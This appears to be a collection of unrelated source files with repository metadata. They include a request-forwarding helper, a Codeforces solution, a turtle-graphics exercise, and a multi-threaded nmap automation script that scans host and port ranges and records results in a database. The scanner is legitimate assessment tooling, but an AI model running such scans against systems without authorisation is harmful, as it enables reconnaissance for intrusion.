finally:
log.info('Closing env...')
multi_env.close()
return 0
if __name__ == '__main__':
sys.exit(main())
| [
"[email protected]"
]
| |
70d21f0315e69b783a6c51389ee8a14057eec12e | ae08a53864b4ec19458eae7bdf072b91b489e595 | /nina-service/app/api/v1/users/messenger.py | d8808844ee411840587e5feb56cf0cb9c1f54339 | []
| no_license | OscarGibson/docker-messenger-test | aee90378691527fd4f7156c3b16490393a548e14 | f04c3d932818b16fa6a304e41ff5492a6d67ccb7 | refs/heads/master | 2022-12-09T07:49:10.324014 | 2018-09-12T07:04:20 | 2018-09-12T07:04:20 | 148,104,678 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 487 | py | import requests
class Messenger:
def __init__(self, receiver, *args, **kwargs):
self.receiver = receiver
self.headers = {
'content-type' : 'application/json',
}
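    # Illustrative usage sketch (the URL and values below are hypothetical, not
    # part of this service):
    #   messenger = Messenger('http://users-service/api/v1/users/%s')
    #   messenger.set_headers(request)  # forward the caller's Authorization header
    #   resp = messenger.send(method='get', params='42')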
def set_headers(self, request_object):
self.headers['Authorization'] = request_object.headers.get('Authorization')
def send(self, data= {}, method= 'get', params= ''):
# print("SENFING: ", self.receiver % params)
return getattr(requests, method)(self.receiver % params, json= data, headers= self.headers) | [
"[email protected]"
]
| |
1da694b5ea387596423c38640e879d0c7a989f94 | 4142b8c513d87361da196631f7edd82f11465abb | /python/round481/978C.py | 507c51c1f9c84ef6c7c7bff283409bd7ae7ba262 | []
| no_license | npkhanhh/codeforces | b52b66780426682ea1a3d72c66aedbe6dc71d7fe | 107acd623b0e99ef0a635dfce3e87041347e36df | refs/heads/master | 2022-02-08T17:01:01.731524 | 2022-02-07T10:29:52 | 2022-02-07T10:29:52 | 228,027,631 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 423 | py | from sys import stdin
import bisect
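# Dorms hold a[i] rooms each; for each queried global room number, binary-search
# the prefix sums to find its dormitory, then subtract to get the local room.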
n, m = list(map(int, stdin.readline().split()))
a = list(map(int, stdin.readline().split()))
b = list(map(int, stdin.readline().split()))
p_a = [0]*n
p_a[0] = a[0]
for i in range(1, n):
p_a[i] = a[i] + p_a[i-1]
p_a = [0]+p_a
for i in b:
dorm = bisect.bisect(p_a, i)
room = i - p_a[dorm-1]
if room == 0:
dorm -= 1
room = a[dorm-1]
print(dorm, room)
| [
"[email protected]"
]
| |
975cc3aa400100762371f0e3f43f4b6231beca20 | 05805ab879654cdcf61df3653847f435b624dc77 | /Dictator_service/bin_gui/main_class_based_backup.py | 9162aa49b03b5749bea6d70fda67e3c8bdbf4208 | []
| no_license | Wuwqhnsya/Dictator | 3d57db6bc0138464884ddc9fe7378907ab86e3ef | 45388fec03a4acdac3620611b3bccfa3c991d65f | refs/heads/master | 2020-04-28T21:57:39.309165 | 2019-01-28T19:10:28 | 2019-01-28T19:10:28 | 175,600,478 | 1 | 0 | null | 2019-03-14T10:34:02 | 2019-03-14T10:34:02 | null | UTF-8 | Python | false | false | 31,366 | py | #!/usr/bin/python
import time
import threading
import time
import nmap
import multiprocessing
import os
import sys
import ConfigParser
#import mysql.connector
import MySQLdb
import atexit
import IPtable
import texttable as tt
import Simple_Logger
r = '\033[31m' #red
b = '\033[34m' #blue
g = '\033[32m' #green
y = '\033[33m' #yellow
m = '\033[34m' #magenta
c = '\033[36m' #magenta
e = '\033[0m' #end
def test():
print "\n\n\n Exiting Bye Bye !!!"
atexit.register(test)
class NmapScan:
def __init__(self):
self.IP=""
self.PORT=None
self.SWITCH=""
self.CURRENT_PROJECT_ID=""
self.takescan=""
self.N=4
self.Port_Divisior=7500
self.Pause_Flag=False
self.Stop_Flag=False
self.ipcount=0
self.IPtable=IPtable.IPtable()
self.method_id="INIT"
self.Thread_pool=[]
self.retry_count=0
self.max_retries=3
self.simple_logger=Simple_Logger.SimpleLogger()
self.lock=threading.Lock()
self.folder_name=os.path.join("Results","Data_")
    def generate_Error_log(self, status, ipx, portx, pid):
try:
print "Logged exception"
'''self.data_path=self.folder_name+str(self.pid)
error_file=str(project_id)+"_error.txt"
error_file_path = os.path.join(self.data_path, error_file)
self.lock.acquire()
simple_logger.log(error_file_path,"Error -->,Status:Error Complete,Host :"+str(ipx)+",Port:"+str(portx)+",Project id :"+str(pid)+"\n")
self.lock.release()'''
except Exception ,ee:
print "Exception while writing to error file :"+str(ee)
def portscanner(self,ipx,portx): #switch,current_project_id
nm=nmap.PortScanner()
try:
if portx=="top_ports":
nm.scan(ipx,None,self.SWITCH)
else:
nm.scan(ipx,portx,self.SWITCH)
except Exception ,ex:
self.seperator()
print r+"\n\nEXCEPTION in nmap built in utiliry--> "+str(ex) +e
self.seperator()
self.seperator()
print g+"\n\nRe-attempts made on this record :"+str(self.retry_count)+e
self.seperator()
self.retry_count =self.retry_count+1
if (self.retry_count < self.max_retries):
print g+"\n\nRe-attemting for the failed record"+e
self.IPtable.UpdateStatus('incomplete',ipx,portx,int(self.CURRENT_PROJECT_ID))
else:
print g+"\n\nMax re attempts exceeded - Updating status to ERror-complete"+e
print r+"\n\nPlease see the error log for further details.IT would mention the host for which the nmap module failed"+e
self.IPtable.UpdateStatus('error-complete',ipx,portx,int(self.CURRENT_PROJECT_ID))
self.generate_Error_log('error-complete',ipx,portx,int(self.CURRENT_PROJECT_ID))
return 0
try:
temp=nm.scanstats()['uphosts']
if (int(temp) != 0):
host=ipx
if 'tcp' in nm[host].all_protocols():
self.seperator()
print "Result for IP : " + host
print('Protocol : TCP' )
for kk in nm[host]['tcp'].keys():
if (nm[host]['tcp'][kk]['name'])=='':
nm[host]['tcp'][kk]['name']='unknown'
lport = nm[ipx]['tcp'].keys()
lport.sort()
for port in lport:
print b+'port : ' +y+str(port) + ' \t ' + g+ nm[host]['tcp'][port]['state'] +' \t' +r +'' + nm[host]['tcp'][port]['name'] +e
self.seperator()
sd=nm.csv()
#print "Reached at update point "
try :
self.IPtable.Update(sd,portx,ipx,int(self.CURRENT_PROJECT_ID))
except Exception ,ee :
self.print_Log("Exception in update "+str(ee))
print "EXception Update main "+str(ee)
if 'udp' in nm[host].all_protocols():
self.seperator()
#self.IPtable.Update(sd,portx,ipx,int(self.CURRENT_PROJECT_ID))
print "Result for IP : " + host
print('Protocol : UDP' )
lport = nm[ipx]['udp'].keys()
lport.sort()
                    for kk in nm[host]['udp'].keys():
if (nm[host]['udp'][kk]['name'])=='':
                            nm[host]['udp'][kk]['name']='unknown'
for port in lport:
print b+'port : ' +y+str(port) + ' \t ' + g+ nm[host]['udp'][port]['state'] +' \t' +r +'' + nm[host]['udp'][port]['name'] +e
self.seperator()
sd=nm.csv()
try :
self.IPtable.Update(sd,portx,ipx,int(self.CURRENT_PROJECT_ID))
except Exception ,ee :
print "EXception Update main "+str(ee)
self.print_Log("Exception in update "+str(ee))
status="complete"
#print "\n\n\n!!!Completed!!! Ip : "+ipx+"\n\n\n -Protocols ---> "+str(nm[host].all_protocols())+"\n\n"
try :
self.IPtable.UpdateStatus(status,ipx,portx,int(self.CURRENT_PROJECT_ID))
except Exception ,ee :
self.print_Log("Exception in update status "+str(ee))
else:
statuss="host-down"
try :
self.IPtable.UpdateStatus(statuss,ipx,portx,int(self.CURRENT_PROJECT_ID))
except Exception ,ee :
self.print_Log("Exception in update status host-down "+str(ee))
except Exception,exc:
self.print_Log("Parent exception : "+str(exc))
def ThreadEnd(self,ipl):
print "\n\nThread ended with host ip -"+str(ipl)+"\n\n"
#startProcessing(1)
def simplescanner(self,ipl):
self.method_id="Simple scanner"
self.print_Log("Started Simple acanner")
stport=0
lsport=0
port_list=[]
process_list=[]
try :
port_list=self.IPtable.getPorts(str(ipl),self.CURRENT_PROJECT_ID)
if(port_list):
for port in port_list:
fport=str(port[0]) #fport=1 -5001
#print "\n\nFport is :"+fport +" IP :" +str(ipl) +"id :" +str(self.CURRENT_PROJECT_ID)
time.sleep(10)
try :
self.IPtable.UpdateStatus('processing',ipl,fport,int(self.CURRENT_PROJECT_ID))
except Exception, ee:
print "EXception 13.01 : " +str(ee)
tp=multiprocessing.Process(target=self.portscanner,args=(ipl,fport)) #
process_list.append(tp)
tp.start()
#print "\n\nStarted subprocess for ip " +str(ipl) +" and port "+ str(port) +" and Process : "+str(tp)
for process_ in process_list:
process_.join()
print "\n\n Finished subprocess for ip " +str(ipl) +" and Process : "+str(process_)
else:
#print "The current ip address has all its ports scanned -->Must have not been there" +str(ipl)
self.print_Log("Some exception-->The current ip address has all its ports scanned -->Must have not been there" +str(ipl))
self.print_Log("Ended Simple acanner")
except Exception ,ee:
print "EXception 11" +str(ee)
self.print_Log("Exception inSimpleScanner-->"+str(ee))
self.ThreadEnd(ipl)
def topport_scan(self,ipls,portl): #this would be invoked if the given port list would be empty such that only the top ports would be scanned
tp=multiprocessing.Process(target=portscanner,args=(ipls,"top_ports"))
tp.start()
tp.join()
def getBulkInsertList_(self,start,end,iplist):
#print "About to make bulk enteries - #Ip:"+ str(len(iplist) )
BulkList=[]
counter=1
#global P
for ip in iplist:
x=int(start)
pnum=end-start+1 #First port number in the sequence say 1-10023 is the range ->pnum =10023
r=pnum%self.Port_Divisior #r = 10023 % 5000 --> r=23
q=pnum//self.Port_Divisior # Floor division ->q=quetient= 10023/5000 => 2.004 ,since floor ,thus q=2
check=q*self.Port_Divisior #check =2*5000 =>10,000
#x=int(start) #x=1
ip_list=[]
while check>0: #(1) check=10000 >0 (2) check=5000 > 0
for tport in range(x,x+self.Port_Divisior,self.Port_Divisior):
fport=str(tport)+'-' +str(tport+self.Port_Divisior) #fport=1 -5001
BulkList.append((self.CURRENT_PROJECT_ID,ip,fport,'incomplete'))
x=x+self.Port_Divisior
check=check-self.Port_Divisior # (A) 1 --> check=5000 , (B) 1 --> check =0
counter=counter+1
#By this time 1-10,000 ports would be scanned .The idea is to scan 5000 ports at 1 time.
#The number of ports left are 23
check=q*self.Port_Divisior #check =10,000
#print "\n\n\n\n check is "+str(check )+" Pnum is "+str(pnum)+"\n\n\n\n"
if check < end :
if pnum!=0 : #pnum=10023
print "Scanning remaining ports"
prange=str(start+check)+"-"+str(start+check+r-1) #prange= (100001-10,0023) -->Thus the remaining 23 ports are ranged out
print "Range is :"+ prange+"\n\n\n"
BulkList.append((self.CURRENT_PROJECT_ID,ip,prange,'incomplete'))
print "\n\nLoop executed : "+str(counter)
return BulkList;
def getBulkInsertList(self,all_ports,iplist):
print "(1)--About to make bulk enteries - #Ip:"+ str(len(iplist))
BulkList=[]
if (all_ports == None) :
print "in if(1)"
all_Ports_="top_ports"
for ip in iplist:
BulkList.append((self.CURRENT_PROJECT_ID,ip,all_Ports_,'incomplete'))
elif "-" in all_ports:
print "in elif(1)"
tlist=all_ports.split('-') #Split them and the list would be stored in variable named tlist
stport=int(tlist[0]) #First port
lsport=int(tlist[1])
if ((lsport-stport)< 5000):
for ip in iplist:
BulkList.append((self.CURRENT_PROJECT_ID,ip,all_ports,'incomplete'))
else :
BulkList=self.getBulkInsertList_(stport,lsport,iplist)
else :
print "in else"
for ip in iplist:
BulkList.append((self.CURRENT_PROJECT_ID,ip,all_ports,'incomplete'))
#print "\n\nBulk List is \n\n"
#print BulkList
return BulkList
    def multiscan(self,start,end,ipls): #This would be invoked when the number of ports per host to be scanned exceeds 5000
pnum=end-start+1 #First port number in the sequence say 1-10023 is the range ->pnum =10023
r=pnum%5000 #r = 10023 % 5000 --> r=23
q=pnum//5000 # Floor division ->q=quetient= 10023/5000 => 2.004 ,since floor ,thus q=2
check=q*5000 #check =2*5000 =>10,000
x=int(start) #x=1
while check>0: #(1) check=10000 >0 (2) check=5000 > 0
for tport in range(x,x+5000,5000):
fport=str(tport)+'-' +str(tport+5000) #fport=1 -5001
                tp=multiprocessing.Process(target=self.portscanner,args=(ipls,fport))
tp.start()
#tp.join()
x=x+5000 # (A) 1 --> x=5001 -->It will break from this loop (B) 1 --> x=10,001 -->it shall break the loop
# print "Scan from " + str(tport) + " till " + str(tport+5000)+ " Done"
check=check-5000 # (A) 1 --> check=5000 , (B) 1 --> check =0
#By this time 1-10,000 ports would be scanned .The idea is to scan 5000 ports at 1 time.
#The number of ports left are 23
check=q*5000 #check =10,000
if pnum!=0: #pnum=10023
# print "Scanning remaining ports"
prange=str(start+check)+"-"+str(start+check+r-1) #prange= (100001-10,0023) -->Thus the remaining 23 ports are ranged out
# print prange
            tp=multiprocessing.Process(target=self.portscanner,args=(ipls,prange)) #Finally invoking portscanner for the remaining 23 ports, range (10,001-10,023)
tp.start()
#tp.join()
def singlescan(self,start,end,ipls):
#print "Single Scan"
prange=str(start)+"-"+str(end)
        tp=multiprocessing.Process(target=self.portscanner,args=(ipls,prange))
tp.start()
tp.join()
def numofips(self,iprange): #Converts CIDR notation as simple list
scanner=nmap.PortScanner()
IPlist=scanner.listscan(iprange)
        return IPlist #Thus this would be a list of IP addresses
def banner(self,):
print g+" ################################################################# "+e
print g+" ###"+r+" __ "+g+"### "+e
print g+" ###"+r+" /\ \ \_ __ ___ __ _ _ __ "+g+"### "+e
print g+" ###"+r+" / \/ / '_ ` _ \ / _` | '_ \ "+g+"### "+e
print g+" ###"+r+"/ /\ /| | | | | | (_| | |_) | "+g+"### "+e
print g+" ###"+r+"\_\ \/ |_| |_| |_|\__,_| .__/ "+g+"### "+e
print g+" ###"+r+" |_| "+g+"### "+e
print g+" ###"+r+" _ _ "+g+"### "+e
print g+" ###"+r+" /_\ _ _| |_ ___ _ __ ___ __ _| |_(_) ___ _ __ "+g+"### "+e
print g+" ###"+r+" //_\\| | | | __/ _ \| '_ ` _ \ / _` | __| |/ _ \| '_ \ "+g+"### "+e
print g+" ###"+r+"/ _ \ |_| | || (_) | | | | | | (_| | |_| | (_) | | | | "+g+"### "+e
print g+" ###"+r+"\_/ \_/\__,_|\__\___/|_| |_| |_|\__,_|\__|_|\___/|_| |_| "+g+"### "+e
print g+" ###"+r+" "+g+"### "+e
print g+" ###"+r+" __ _ _ "+g+"### "+e
print g+" ###"+r+"/ _\ ___ _ __(_)_ __ | |_ "+g+"### "+e
print g+" ###"+r+"\ \ / __| '__| | '_ \| __| "+g+"### "+e
print g+" ###"+r+"_\ \ (__| | | | |_) | |_ "+g+"### "+e
print g+" ###"+r+"\__/\___|_| |_| .__/ \__| "+g+"### "+e
print g+" ###"+r+" |_| "+g+"### "+e
print g+" ###"+b+" Written by: M$P@T3L "+g+"### "+e
print g+" ################################################################# "+e
def seperator(self):
print r+ "----------------------------------------------" +e
    def create_schema(self):  # note: relies on module-level schema_file and conn (sqlite3), which are not defined in this file
with open(schema_file, 'rt') as f:
schema = f.read()
conn.executescript(schema)
def prompt_project(self):
projectname=raw_input(b+"What is your Project name(no white spaces)? \n>"+y)
return projectname
def prompt_ips(self):
ips=raw_input(b+"Type the IP range: \n>"+y)
IP=ips
return ips
def prompt_ports(self):
ports=raw_input(b+"Enter the Port number or Ports range: \n>"+y)
#global PORT
if ports == "":
self.PORT=None
elif(ports=="*"):
self.PORT="1-65535"
else:
self.PORT=ports
return self.PORT
def print_Log(self,message):
print str(message)
def print_Error(self,message):
print str(message)
def db_projectname(self,projectname_db,IP_range,Port_range): # Store the project name and return the auto generated id
self.method_id="db_projectname"
self.print_Log("Method started")
print "Hello"
time.sleep(10)
try :
pid=self.IPtable.Insert(projectname_db,IP_range,Port_range)
if (pid !=-1):
self.CURRENT_PROJECT_ID=pid
else:
self.print_Log("Some error occured while storing !!" +str(pid))
self.print_Log("Method ended")
except Exception ,ee :
self.print_Error( "Exception in db_projectname "+str(ee))
#print self.CURRENT_PROJECT_ID
#print cursor.lastrowid
def scanbanner(self):
cp=ConfigParser.RawConfigParser() #parses config files
cppath="nmap.cfg" #This is the config file to be read.The config file would have various sections.Each section would be in [sq] beakets.each section would be having key/val pairs as conf setting options
cp.read(cppath) #Read the current file nmap.cfg.The file has got only 1 section given as :[Scantype]
#global self.SWITCH
#global self.takescan
print b+"SELECT THE TYPE OF SCAN: "
self.seperator()
print y+"1). Intense Scan"
print "2). Intense + UDP Scan"
print "3). Intense + TCP full Scan"
print "4). Intense + No Ping Scan"
print "5). TCP Ping Scan"
print "6). PCI Ping Sweep"
print "7). PCI full ports TCP"
print "8). PCI Top 200 UDP"
print "9). PCI Top 100 UDP"
print "10). PCI Top 1000 TCP"
self.takescan=raw_input(b+"Select the type of Scan:\n>"+y)
if self.takescan=="1":
self.SWITCH=cp.get('Scantype','Intense')
elif self.takescan == "2":
self.SWITCH=cp.get('Scantype','Intense_UDP') #-sU -T4 -A -n
elif self.takescan == "3":
self.SWITCH=cp.get('Scantype','Intense_TCPall') #-sS -T4 -A -n--max-rtt-timeout 500ms
elif self.takescan == "4":
self.SWITCH=cp.get('Scantype','Intense_NoPing') #T4 -A -v -Pn -n
elif self.takescan == "5":
self.SWITCH=cp.get('Scantype','Ping') #-PS
elif self.takescan == "6":
self.SWITCH=cp.get('Scantype','PCI_Ping_Sweep') #-PE -n -oA
elif self.takescan == "7":
self.SWITCH=cp.get('Scantype','PCI_Full_ports_TCP') #-Pn -sS -sV -n --max-retries 3 --max-rtt-timeout 1000ms --top-ports 1000
elif self.takescan == "8":
self.SWITCH=cp.get('Scantype','PCI_Top_200_UDP') #-Pn -sU -sV -n --max-retries 3 --max-rtt-timeout 100ms --top-ports 200
elif self.takescan == "9":
self.SWITCH=cp.get('Scantype','PCI_Top_100_UDP') #-Pn -sU -sV -n --max-retries 3 --max-rtt-timeout 100ms --top-ports 100
elif self.takescan == "10":
self.SWITCH=cp.get('Scantype','PCI_Top_1000_TCP') #-Pn -sS -sV -n --max-retries 3 --max-rtt-timeout 500ms
else:
print "Invalid value supplied"
print "Using Default(1)"
self.SWITCH=cp.get('Scantype','Intense')
def prompt_ProjectID(self): #would prompt the user with paused projects -->status=incomplete or paused in projects table
print "\n"
tab = tt.Texttable()
x = [[]] #multi dimension array
cursor=self.IPtable.getPausedScans()
if cursor:
print r+"List of Project with IDs"+e +"\n"
for row in cursor:
x.append([str(row[0]),str(row[1])]) #Place details in the array to display later
tab.add_rows(x) #thus the table would have all rows and 2 columns
tab.set_cols_align(['r','r'])
tab.header(['IDs','PROJECT_NAME']) #setting heder details for col
print tab.draw() #this would draw the table on the console
print "\n"
id_ = raw_input(b+"Enter The Project Id For Scanning :"+e)
try :
if(int(id_)):
return id_
except :
print "Exception 6-->Invalid Value"
return ""
else:
print "\n\nNo incomplete Projects\n\n";
time.sleep(1);
self.main()
def prompt_ScanType(self):
scanType=raw_input(b+"Enter Your choice: \n"+y +"\n(1) For Launching New Scan \n(2) For Launching Paused Scans\n "+e)
try:
if((int(scanType)<1)or(int(scanType) >2)):
return 1;
else :
return scanType;
except :
return 1;
def getHostPort(self,project_id):
try:
self.method_id="getHostPort()-->main"
self.print_Log("Started")
project_data=[]
project_data=self.IPtable.getHostPort(project_id)
self.method_id="getHostPort()-->main"
self.print_Log("Ended")
return project_data
except Exception ,ee:
print "Exception 14" +str(ee)
self.print_Error("Exception --getHostPort--"+str(ee))
return 0;
def launch_PausedScan(self,project_id):
print "Reached Here in Launch Paused Scan !!!\n";
self.method_id="LaunchPausedScan()"
self.print_Log( "Started Launch Paused ")
success=self.IPtable.MakeUpdate(project_id)
if(success==1):
self.startProcessing(self.N)
elif(success==2): #when its paused b4 making bulk entries
port_host=self.getHostPort(project_id)
if(port_host):
ip_range=port_host[0]
port_range=port_host[1]
listip=self.numofips(ip_range)
BulkEntries=self.makeBulkEnteries(listip,port_range)
#global N
self.startProcessing(self.N)
else:
print "The given project id is not present in Database :-->Kindly recheck "
self.print_Log("The given project id is not present in Database :-->Kindly recheck ")
else:
print "\n\nThe update method for status= incomplete has exception \n\n"
self.print_Log("The update method for status= incomplete has exception ")
def stop_all(self):
os._exit()
def makeBulkEnteries(self,all_hosts,all_ports):
#print "In here !!1"
self.method_id="makeBulkEntries()"
self.print_Log("Started")
BulkList=[]
if 1:
BulkList=self.getBulkInsertList(all_ports,all_hosts)
self.method_id="makeBulkEntries()"
self.method_id="makeBulkEntries"
try:
status=self.IPtable.InsertAll(BulkList)
self.method_id="makeBulkEntries()"
if (status != 1):
print "Some error occured while bulk insertion"
except Exception ,ee :
print "EXception 9 "+str(ee)
self.print_Error("EXception make Bulk entries --> "+str(ee))
self.print_Log("Ended")
return BulkList;
def getAllDistinctHosts(self,n):
try :
self.method_id="getAllDistinctHost()"
self.print_Log("started")
iplist=[]
iplist=self.IPtable.DistinctHosts(self.CURRENT_PROJECT_ID,int(n))
self.method_id="getAllDistinctHost()"
self.print_Log("Ended")
return iplist
except Exception ,ee :
print "Exception 10 " +str (ee)
self.print_Error("Exception "+str(ee))
return 0
def start_Polling(self):
try:
stop_db_poll=False #use this logic to stop unnecessary db poll when all hosts finish
#global N
while 1:
time.sleep(5)
active_threads=threading.enumerate()
counter=len(active_threads)
print self.seperator()
print "Polling \n Threads remaining are :"+str(active_threads)+"\n"
print self.seperator()
                # Why re-check when only the main thread remains: worker threads flip a
                # record's status from 'incomplete' to 'processing', but a thread that was
                # started and not yet scheduled leaves its record 'incomplete' while the
                # poller already counts a single thread. So on count == 1, re-check the DB:
                # if records are still 'processing'/'incomplete' and the project was not
                # deliberately paused, restart processing; a user-paused project (status
                # 'paused' in the projects table) is ignored and the scan ends.
if(counter==1):
status=self.IPtable.checkStatus(self.CURRENT_PROJECT_ID)
if(status):
processing_status=status[0]
pause_status=status[1]
if((processing_status) and (not (pause_status))):#will just check once
print "Still left with some hosts that display status as processing or incomplete "
time.sleep(10)#the reason for this delay is suppose some thread is fired but not scheduled yet and thus the status would show as incomplete and if we immidiately statprocessing,then 2 threads might point to 1 record
self.startProcessing(self.N)
#print "Main Thread--->Again Starting pooling in 50 sec :"
time.sleep(50)
else:
print "Active Threads are only 1 --Scan about to finish --Threads remaining are :"+str(active_threads)
self.print_Log("Active Threads are only 1 --Scan about to finish --Threads remaining are :"+str(active_threads))
break;
#include logic to stop unnecessary polling see count (*) where status=p if that=limit then dont poll
elif(counter <=(self.N+1)):
if(not(self.getPausedStatus(self.CURRENT_PROJECT_ID))):
limit=(self.N+1)-counter
if(limit != 0):
#print "\n\nLaunching :"+str(limit)+" Threads for hosts"
left_hosts=self.startProcessing(limit) #chk if its 0 then break or dont poll till current th fn
#print "Making main thread sleep for 1 seconds"
time.sleep(1)
#print "Waking main thread awake after 1 seconds"
else:
#print "Making main thread sleep for 1 seconds"
time.sleep(1)
#print "Waking main thread awake after 1 seconds"
else:
time.sleep(10)
else :
print "\n\n\n\n------FATEL ERROR-------\n\n\n"
print "Number of threads cant exceed : "+str(self.N+1)
except Exception ,ee:
print "Exception caught 15" +str(ee)
def StartThreads(self,hosts):
#print "\n In start thread method !!! \n"
self.method_id="Start THreads"
threads=[]
#print "Starting : "+str(len(hosts)) +"Threads for "+ str(hosts) +"Hosts :"
print "\n"
print self.seperator()
self.print_Log("Starting : "+str(len(hosts)) +"Threads for "+ str(hosts) +"Hosts" )
print self.seperator()
print "\n"
for host in hosts:
#print "host is "+str(host)
lk= threading.enumerate()
#print "\n Current thread count : "+str(len(lk))
#print "\n\nThe threads enumerate returned are : " +str(lk) +"\n\n"
self.print_Log(g+"******************************************************************************************************************************************\n"+e+"Current thread count : "+str(len(lk)))
self.print_Log("The threads enumerate returned are : " +str(lk)+g+"\n******************************************************************************************************************************************"+e)
if len(lk)<(self.N+1) :
currentIP= str(host)
obj=NmapScan()
obj.IP=self.IP
obj.PORT=self.PORT
obj.SWITCH=self.SWITCH
obj.CURRENT_PROJECT_ID=self.CURRENT_PROJECT_ID
obj.takescan=self.takescan
obj.N=self.N
obj.Port_Divisior=self.Port_Divisior
obj.Pause_Flag=self.Pause_Flag
obj.Stop_Flag=self.Stop_Flag
obj.ipcount=self.ipcount
obj.IPtable=IPtable.IPtable()
obj.simple_logger=self.simple_logger
#self.method_id="INIT"
t = threading.Thread(target=obj.simplescanner, args=([currentIP]))
threads.append(t)
#print "Starting thread for IP :"+str(host)
#self.print_Log("Starting thread for IP :"+str(host))
t.start()
self.Thread_pool.append(t)
#print "\n\n\nStarted thread for IP :"+str(host) + " --> Thread is : "+ str(t)
self.print_Log( "\nStarted thread for IP :"+str(host) + " --> Thread is : "+ str(t))
time.sleep(3)
def startProcessing(self,n):
try :
All_hosts=self.getAllDistinctHosts(n)
#print "Hosts to be given to thread : "+str(All_hosts)
if (All_hosts):
self.StartThreads(All_hosts)
else :
return;
except Exception ,ee :
print "Exception 12 " +str(ee)
def getPausedStatus(self,project_id):
try :
status=self.IPtable.getStatus(project_id)
return status
except Exception ,ee:
print "Exception getstatus " +str(ee)
return 0
def pause_scan(self):
global Pause
Pause =1
        self.stop_all()
def main(self,path='',targethosts='',targetports='',switch='',scan_type='',mode="c",project_id='',assessment_id='',app_id=''):
if (scan_type=="1"):
self.SWITCH=switch
self.PORT=targetports
print "The mode recieved is :" +str(mode)
if(mode=="c"):
self.db_projectname(path,targethosts,self.PORT)
self.seperator()
elif mode =="g-init":
if assessment_id =='':
return;
else:
self.db_projectname(path,targethosts,self.PORT)
self.IPtable.update_mapping(app_id,self.CURRENT_PROJECT_ID,assessment_id)
return self.CURRENT_PROJECT_ID
elif mode=="g-start":
self.CURRENT_PROJECT_ID=int(project_id)
x=333#gui mode
print b +"[+]" + "Starting SCAN" +e
#targethosts=['10.0.1.39','10.0.1.39','10.0.1.39','10.0.1.39']
ipcount=len(self.numofips(targethosts))
if (',' in targethosts):
listip=targethosts.split(',')
else:
listip=self.numofips(targethosts)
BulkEntries=self.makeBulkEnteries(listip,self.PORT)
#global N
self.startProcessing(self.N) #this is the part wher the prompt input finishes
#print "Main Thread Starting pooling in 50 sec :"
time.sleep(100)
# "**Pooling started **\n"
self.method_id="Main()"
self.print_Log("**Pooling started :**")
self.start_Polling()
#print "\n\n\n\n\nScan Finished\n\n\n\n\n "
else:
#global self.CURRENT_PROJECT_ID
if (mode=="c"):
self.CURRENT_PROJECT_ID=self.prompt_ProjectID()
else:
self.CURRENT_PROJECT_ID=int(project_id)
if (self.CURRENT_PROJECT_ID != ""):
self.launch_PausedScan(self.CURRENT_PROJECT_ID)
print "\n\nMain thread starting Polling .........\n\n"
print "Main Thread Starting pooling in 10 sec :"
time.sleep(100)
print "Pooling started :"
self.start_Polling()
def driver_main(self,ips='',project_name='',port='',scan_type='',switch='',project_id='',mode="c",assessment_id="",app_id=""):
try:
print ("("+ips,project_name,port,scan_type,switch,project_id,mode,assessment_id,app_id+")")
print "\n\n Hello world \n\n"
time.sleep(10)
start = time.time()
os.system('cls' if os.name == 'nt' else 'clear')
db_filename="nmapscan"
start = time.time()
#self.main()
#mode="c"path='',targethosts='',targetports='',switch='',scan_type='',mode="c",project_id=''):
self.main(project_name,ips,port,switch,scan_type,mode,project_id,assessment_id,app_id)
print "Reached here as well !!!"
if mode != "g-init" :
th_count=threading.enumerate()
print "# of threads Alive are :"+str(len(th_count))
#while (1) :
if 1:
if (len(th_count)==1):
print "\nNow stopping and saving Global Project Id : "+ str(self.CURRENT_PROJECT_ID)+"\n";
#global self.CURRENT_PROJECT_ID
if ((self.CURRENT_PROJECT_ID != "") and (self.CURRENT_PROJECT_ID is not None)):
                            status=self.IPtable.checkStatus(self.CURRENT_PROJECT_ID)  # re-check: a just-started worker may not have flipped its record from 'incomplete' yet; a deliberately paused project is left alone
if(status):
processing_status=status[0]
pause_status=status[1]
if((processing_status) and (not (pause_status))):#will just check once
print "Still left with some hosts that display status as processing !!!"
time.sleep(10)#the reason for this delay is suppose some thread is fired but not scheduled yet and thus the status would show as incomplete and if we immidiately statprocessing,then 2 threads might point to 1 record
self.startProcessing(self.N)
print "Main Thread--->Again Starting pooling in 50 sec :"
time.sleep(50)
print "Polling started-->again :"
self.start_Polling()
#xx=2
if ((not(processing_status)) and (not(pause_status))): #to update status from incompl to comp
print "Launching clear logs !!!"
self.IPtable.clearLogs(self.CURRENT_PROJECT_ID,'complete')
#else :
#clearLogs(self.CURRENT_PROJECT_ID,'complete')
end_time = time.time()
print "Time taken in seconds : "+str(end_time-start)
elif mode =="g-init":
print "\n\nPROPER\n\n"
return self.CURRENT_PROJECT_ID
except KeyboardInterrupt:
print c+"\n[*]"+g+" Scan is Aborted"+e
print c+"[*]"+g+" Stopping"+e
self.print_Log("\n[*]"+g+" Scan is Aborted")
time.sleep(1)
pass
except Exception ,ee:
self.print_Log("Exception in driver() "+str(ee))
#NmapScanObj=NmapScan()
#NmapScanObj.driver_main()
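# Illustrative invocations (argument values below are hypothetical):
#   NmapScan().driver_main(ips='10.0.1.0/28', project_name='demo', port='1-1000',
#                          scan_type='1', switch='-T4 -A', mode='c')  # new scan
#   NmapScan().driver_main(scan_type='2', mode='c')  # resume: prompts for a paused project id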
| [
"[email protected]"
]
| |
8abdcdf1ba64655f7ec702de32401f6472c1b269 | 5d32d0e65aa3bfa677fd1b8c92569e07e9b82af1 | /Section 1 - Getting Started/Breakouts/Breakout 1.2 - Turtle Graphics/Turtle Shapes v2 - block3.py | 3d15d1a6f050eb70ad28090193dd6b4e8a025c40 | [
"CC0-1.0"
]
| permissive | pdst-lccs/lccs-python | b74ef2a02ac8ad2637f713fff5559f4e56c9827d | 95cb7ece05716521e9951d7a40de8fb20a88021f | refs/heads/master | 2023-05-28T00:46:57.313972 | 2023-05-22T10:16:43 | 2023-05-22T10:16:43 | 240,501,524 | 21 | 18 | null | null | null | null | UTF-8 | Python | false | false | 365 | py | # Event: LCCS Python Fundamental Skills Workshop
# Date: May 2018
# Author: Joe English, PDST
# eMail: [email protected]
# Purpose: Turtle Graphics - Further Activities
# Match the code blocks below to the corresponding shape
from turtle import * # import the turtle graphics library
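# Three 100-step sides joined by 120-degree left turns trace an equilateral triangle.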
forward(100)
left(120)
forward(100)
left(120)
forward(100)
| [
"[email protected]"
]
| |
